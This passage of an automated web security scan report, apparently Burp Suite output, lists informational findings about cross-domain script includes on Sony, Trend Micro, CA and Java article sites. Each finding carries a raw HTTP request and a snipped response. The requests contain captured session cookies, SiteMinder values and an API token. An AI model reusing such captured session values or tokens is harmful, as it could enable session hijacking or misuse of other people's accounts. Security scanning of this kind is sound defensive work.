WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 114876 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Date: Tue, 06 Sep 2011 18:50:12 GMT Content-Length: 114876 Connection: close Vary: Accept-Encoding Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]...
13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The response dynamically includes the following script from another domain:http://nexus2.ensighten.com/sony/Bootstrap.js
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Cteonnt-Length: 75919 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 75919 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:32 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]...
13.15. https://store.trendmicro.com/DRHM/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The response dynamically includes the following scripts from other domains:https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0) Date: Tue, 06 Sep 2011 18:21:15 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app96 Content-Length: 56184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <!-- begin site specific javascript --><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... </style><script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"> </script>...[SNIP]... <div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications."> <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en> </script>...[SNIP]... </script><script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> </script>...[SNIP]... <!-- ####################################### --> <script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
13.16. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The response dynamically includes the following scripts from other domains:https://display.digitalriver.com/?aid=244&tax=trend_micro https://drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js https://drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js https://libs.coremetrics.com/eluminate.js https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0) Date: Tue, 06 Sep 2011 18:15:31 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app96 Content-Length: 95454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <!-- begin site specific javascript --><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"> </script>...[SNIP]... </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag --> <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'> </script>...[SNIP]... <div id="dr_verisign"> <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script><script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> </script>...[SNIP]... <!-- ####################################### --> <script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
13.17. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:25:47 GMT Content-Length: 458334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <scri...[SNIP]... <link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.18. https://www.ca.com/us/register/forgotpassword.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/forgotpassword.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/forgotpassword.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:27:17 GMT Content-Length: 29060 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta http-...[SNIP]... <link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.19. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The response dynamically includes the following scripts from other domains:http://edge.quantserve.com/quant.js http://www.google-analytics.com/urchin.js
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1 Host: www.javalobby.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.2.1 Content-Type: text/html; charset=ISO-8859-1 Date: Tue, 06 Sep 2011 17:55:34 GMT Content-Length: 33566 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Securing Your Java Applications - Acegi Security Style</title> <meta http-equiv="content-type"...[SNIP]... </div> <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]...
13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The response dynamically includes the following scripts from other domains:http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse http://api.recaptcha.net/js/recaptcha_ajax.js http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp http://pagead2.googlesyndication.com/pagead/show_ads.js http://w.sharethis.com/button/buttons.js http://widgets.dzone.com/links/widgets/zoneit.js http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
